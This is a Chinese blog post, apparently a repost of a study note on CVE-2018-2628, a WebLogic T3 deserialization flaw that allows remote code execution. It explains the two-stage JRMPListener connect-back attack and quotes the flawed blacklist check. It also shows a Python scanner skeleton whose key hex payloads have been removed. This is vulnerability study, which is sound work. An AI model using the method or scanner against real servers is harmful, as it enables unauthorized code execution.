CVE-2018-2628 weblogic WLS反序列化漏洞--RCE学习笔记

最新推荐文章于 2023-02-19 13:10:02 发布
最新推荐文章于 2023-02-19 13:10:02 发布
阅读量191 收藏
点赞数
文章标签: java python 数据库
原文链接:http://www.cnblogs.com/KevinGeorge/p/8874516.html
版权

weblogic WLS 反序列化漏洞学习

鸣谢

感谢POC和分析文档的作者-绿盟大佬=>liaoxinxi;感谢群内各位大佬及时传播了分析文档,我才有幸能看到。

漏洞简介

  • 漏洞威胁:RCE--远程代码执行
  • 漏洞组件:weblogic
  • 影响版本:10.3.6.0、12.1.3.0、12.2.1.2、12.2.1.3
  • 温馨提示:对于攻击者自己构造的新的payload,还没有被oracle加入黑名单,所以还是多加留心、持续监控的好。

漏洞复现

  • 我保存了python漏扫脚本,重命名为weblogic2628.py;
  • 使用命令python weblogic2628.py (目标在脚本代码内修改了)探测发现存在漏洞;
  • 由于漏洞环境不能控制,没有做进一步测试;
    1070321-20180418142000380-2110582487.png

    根据大佬分析文档中的步骤,援引如下:

  • 首先利用weblogic的T3或者T3S协议(目标端口7001)进行握手尝试,如果握手成功,发送第一步payload;
    1070321-20180418142538960-2109398262.png
  • 第一步payload,T3服务会解包Object结果,然后通过java反序列化最倒霉的函数readObject函数层层反序列化,去请求攻击者服务器的1099端口,下载恶意payload;借用大神一张图:
    1070321-20180418142730658-294636473.png
  • 第二步,攻击者在自己的服务器上启用ysoserial.exploit.JRMPListener,JRMPListener会将含有恶意代码的payload发送回请求方,这里就是的恶意Payload就是任意代码执行的恶意代码;
  • 援引大神的话:查看weblogic日志,并且可以弹出计算器,借大神一张图:
    1070321-20180418143041266-1458087858.png

漏洞分析部分学习笔记

protected Class<?> resolveProxyClass(String[] interfaces) throws IOException, ClassNotFoundException {
   String[] arr$ = interfaces;
   int len$ = interfaces.length;

   for(int i$ = 0; i$ < len$; ++i$) {
      String intf = arr$[i$];
      if(intf.equals("java.rmi.registry.Registry")) {
         throw new InvalidObjectException("Unauthorized proxy deserialization");
      }
   }

   return super.resolveProxyClass(interfaces);
}

上边放上了源码:来看看InboundMsgAbbrev中resolveProxyClass的实现,resolveProxyClass是处理rmi接口类型的,只判断了java.rmi.registry.Registry,其实随便找一个rmi接口即可绕过。

大概意思应该是,只判断是否是RMI接口,如果是就OK,没有做其他的权限检查,或可信检查,导致攻击者自己起一个RMI接口,就可以引导weblogic去请求自己存好的恶意代码段;这个恶意代码是利用JRMP加载回来的利用readObject解析的,从而达到了RCE的目的。对于JRMP的解析可以看下大神的原话:

核心部分就是JRMP(Java Remote Methodprotocol),在这个PoC中会序列化一个RemoteObjectInvocationHandler,它会利用UnicastRef建立到远端的tcp连接获取RMI registry,加载回来再利用readObject解析,从而造成反序列化远程代码执行。

poc简要分析(隐去关键十六进制payload部分)

def run(dip,dport,index):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整
    sock.settimeout(65)
    server_addr = (dip, dport)
    t3handshake(sock,server_addr)
    buildT3RequestObject(sock,dport)
    rs=sendEvilObjData(sock,PAYLOAD[index])
    print 'rs',rs
    checkVul(rs,server_addr,index)   
def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    print 'handshake successful'
def buildT3RequestObject(sock,port):
    data1 = ''
    data2 = ''.format('{:04x}'.format(dport))
    data3 = ''
    data4 = ''
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))


def sendEvilObjData(sock,data):
    payload=''
    payload+=data  
    payload+=''
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception as e:
        pass
    return res

def checkVul(res,server_addr,index):
    p=re.findall(VER_SIG[index], res, re.S)
    if len(p)>0:
        print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
    else:
        print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])

看一下基本过程就是先进行T3的握手,成功了就发送第一步的payload,然后发送RequestObject,尝试让weblogic反连自己,然后发送恶意数据,通过回显判定恶意特征串来判定是否存在漏洞。

转载于:https://www.cnblogs.com/KevinGeorge/p/8874516.html

weixin_30662011
关注
CVE-2018-2628Weblogic WLS Core Components 反序列化命令执行漏洞
weixin_45253622的博客
12-12 1810
漏洞简介 Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。 漏洞原理 远程攻击者可利用该漏洞在未授权的情况下发送攻击数据,通过T3协议(EJB支持远程访问,且支持多种协议。这是Web Container和EJB Container的主要区别)在Weblogic Server中执行反序列化操作,利用RMI(远程方法调用) 机
WebLogic XMLDecoder反序列化漏洞CVE-2017-10271)复现
box
04-16 337
WebLogic XMLDecoder反序列化漏洞CVE-2017-10271) 0x00 漏洞描述 2017年12月下旬,网上爆出weblogicWLS组件存在xmldecoder反序列化漏洞(cve-2017-10271),直接post构造的xml数据包即可rce。 0x01 受影响WebLogic版本 10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。 0x02 漏洞复现 靶机IP:192.168.190.136 攻击机:192.168.190.1 1、使
Weblogic WLS Core Components 反序列化命令执行漏洞CVE-2018-2628)复现
s1056481432的博客
08-02 856
漏洞介绍 Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。 漏洞环境 我这里是直接用vulhub搭建环境的官网:https://vulhub.org/,使用方法很简单直接git clone https://github.com/vulhub/vulhub.git 就可以了,之后到下载的文件夹找到我们要复现的漏洞的文件夹
Weblogic WLS Core Components 反序列化命令执行漏洞CVE-2018-2628
huangyongkang666的博客
07-25 674
Weblogic WLS Core Components 反序列化命令执行漏洞CVE-2018-2628
Vulhub漏洞系列:Weblogic WLS Core Components 反序列化命令执行漏洞CVE-2018-2628
weixin_43072923的博客
10-16 3589
xxx:xxx00.前言01.简介02.漏洞描述03.漏洞复现 00.前言 这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺ 01.简介   Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。 参考链接: http://www.oracle.com/technetw
WebLogic WLS反序列化漏洞检测工具使用指南
资源摘要信息:"CVE-2018-2628是一个在Oracle WebLogic服务器中发现的远程代码执行(RCE漏洞。攻击者可以通过该漏洞远程利用受影响的服务器,导致未授权的代码执行。此漏洞是由WLS核心组件中的反序列化问题引起的,...
【技术推荐】WebLogic 反序列化漏洞深入分析
m0_73257876的博客
09-25 3269
WebLogic 漏洞存在较多的反序列化类和反序列化的途径,在使用黑名单防御手段下,攻击者只要找到新的反序列化触发点,就能造成新的危害。比如,你有一个类 A,类里面有个属性是类 B,这个时候,在反序列化的过程中,就会先反序列化类 A,之后在填充类 A 的过程中,继续反序列化类 B,类 B 在反序列化完成后,填充到类 A 中,同时整个过程都在一个流中操作,这个时候,只要还是 ObjectOutStream 的 read_value进行反序列化操作就不能饶过黑名单!
Weblogic12c T3 协议安全漏洞分析【CVE-2020-14645 && CVE-2020-2883 && CVE-2020-14645】
weixin_45694388的博客
10-02 2190
前言 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件。 主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 近几年频繁爆发出多个RCE漏洞,而在今年,其T3协议被频繁攻击和发布补丁与绕过,本文主要对今年来由T3协议入口所产生的多个RCE漏洞进行分析,其中主要包括CVE-2020-2555、 CVE-2020-2883(bypass CVE-2020-2555补丁)、 CVE-2020
Pocsuite3复现Weblogicwls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)
jstang的博客
04-15 4092
目录 一、安装pocsuite库 二、启动漏洞环境 三、编写poc脚本(poc.py) 四、主程序调用 五、执行输出 一、安装pocsuite库 pip3 install pocsuite3==1.6.6 二、启动漏洞环境 docker run -itd --name weblogic -p 7001:7001 vulhub/weblogic:10.3.6.0-2017 三、编写poc脚本(poc.py) import re import time import base64 import soc
Weblogic反序列化远程代码执行漏洞(CVE-2018-2628) 补丁包
08-17
Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞,这个是weblogic12.1.3.0 版本的补丁包,有需要的可以下载
WLS Core Components反序列化命令执行漏洞CVE-2018-2628
wcl20010的博客
05-24 628
目录 原理 影响版本: 常规利用方式: 信息收集 漏洞检测方法 攻击操作 另一种方式 exp利用方式 原理 远程攻击者可利用该漏洞在未授权的情况下发送攻击数据,通过T3协议(EJB支持远程访问,且支持多种协议。这是Web Container和EJB Container的主要区别)在Weblogic Server中执行反序列化操作,利用RMI(远程方法调用) 机制的缺陷,通过 JRMP 协议(Java Remote Messaging Protocol:java远程消息交换协议)达到执行任
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC
IT界迷者Blog--
10-17 6952
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC #!env python # -*- coding: utf-8 -*- import socket import time import re import sys VUL=['CVE-2018-2893'] #remote ip changed to :127.0.0.1 PAYLOAD=['ACED0005...
CVE-2018-2628(Weblogic WLS Core Components (核心组件)反序列化命令执行漏洞)
Sea_Sand息禅
07-14 1091
vulhub上面复现的 一、环境搭建 docker-compose up -d //docker搭建环境 我们先访问这个环境:your-ip:7001,发现是404,这时环境还没搭建好,需要访问一下your-ip:7001/console,这里会自动进行一些环境部署,出现登录界面就是搭建完成了。 二、复现攻击 1、工具准备 1)java反序列化漏洞需要用到ysoserial http...
CVE-2018-2628
04-18 230
哈哈哈,终于等到我复现一个CVE漏洞了。漏洞描述Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。攻击者可以在未授权的情况下,通过T3协议在WebLogic Ser...
weblogic预警及历史漏洞
a1b2c3是弱口令
10-17 1283
简介 1、 Oracle WebLogic CVE-2019-2891 漏洞预警 2、WebLogic历史漏洞回顾 1.预警 Oracle 官方发布了 2019 年 10 月的严重补丁更新 CPU(Critical Patch Update),其中修复了存在于 WebLogic 中的一个高危漏洞CVE-2019-2891)。 1.1预警描述 此漏洞为远程代码执行漏洞,基于全球使用该产品用...
Weblogic CVE-2018-2628 T3协议反序列化命令执行漏洞
最新发布
读书 买花 长大
02-19 1018
CVE-2018-2628
验证WebLogic CVE-2018-2628漏洞的POC工具使用
CVE-2018-2628漏洞是指在WebLogic服务器中存在一个远程代码执行(RCE漏洞,该漏洞允许未经认证的远程攻击者通过特定的网络请求在受影响的服务器上执行任意代码。这个漏洞由Oracle在2018年修补,编号为CVE-2018-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值